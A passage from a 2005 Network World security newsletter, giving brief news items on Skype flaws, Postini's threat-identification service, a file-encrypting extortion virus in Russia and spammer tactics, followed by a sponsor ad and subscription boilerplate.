critical flaws in the software that were disclosed Tuesday by
Skype's maker, Skype Technologies.

Postini to sell threat-identification technology to others,
10/25/05 <http://www.networkworld.com/nlsecuritynewsal9625>
E-mail security service provider Postini Monday made
commercially available the Postini Threat Identification Network
service, which the company has been using internally to pinpoint
senders of spam and malicious e-mail.

Extortion virus makes rounds in Russia, 10/25/05
<http://www.networkworld.com/nlsecuritynewsal9626>
Two new versions of a virus first reported in May are staging
renewed attacks against computers in Russia, encrypting files
and then extorting money from victims to decode the files.

Spammers' new tricks, 10/25/05
<http://www.networkworld.com/nlsecuritynewsal9627>
You gotta hand it to spammers for at least one thing: They're
industrious. Always trying to get into your servers and bypass
your anti-spam software, spammers are now launching some...

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
<http://www.networkworld.com/nlsecuritynewsal9628>
2. How to respond to a security breach
<http://www.networkworld.com/nlsecuritynewsal9629>
3. School traps infected PCs in its web
<http://www.networkworld.com/nlsecuritynewsal9459>
4. Cartoon of the Week
<http://www.networkworld.com/nlsecuritynewsal9460>
5. CTO: BellSouth lost 9 COs to Katrina
<http://www.networkworld.com/nlsecuritynewsal9630>

_______________________________________________________________
To contact:

Senior Editor Ellen Messmer covers security for Network World.
Contact her at <mailto:emessmer@nww.com>.
_______________________________________________________________
This newsletter is sponsored by ConSentry Networks
Stop Malware in Milliseconds Not Minutes

Detect and contain malware in milliseconds before it spreads and
takes down your network. ConSentry uses custom algorithms based
on malware behavior, rather than complex baselining or
signatures, to thwart attacks and ensure network availability.
For more information click here
http://www.fattail.com/redir/redirect.asp?CID=117985
_______________________________________________________________
ARCHIVE LINKS

Security research center Latest security news, analysis,
newsletters and resource links.
<http://www.networkworld.com/topics/security.html>
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

<http://www.networkworld.com/news/2005/101005-grid.html>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005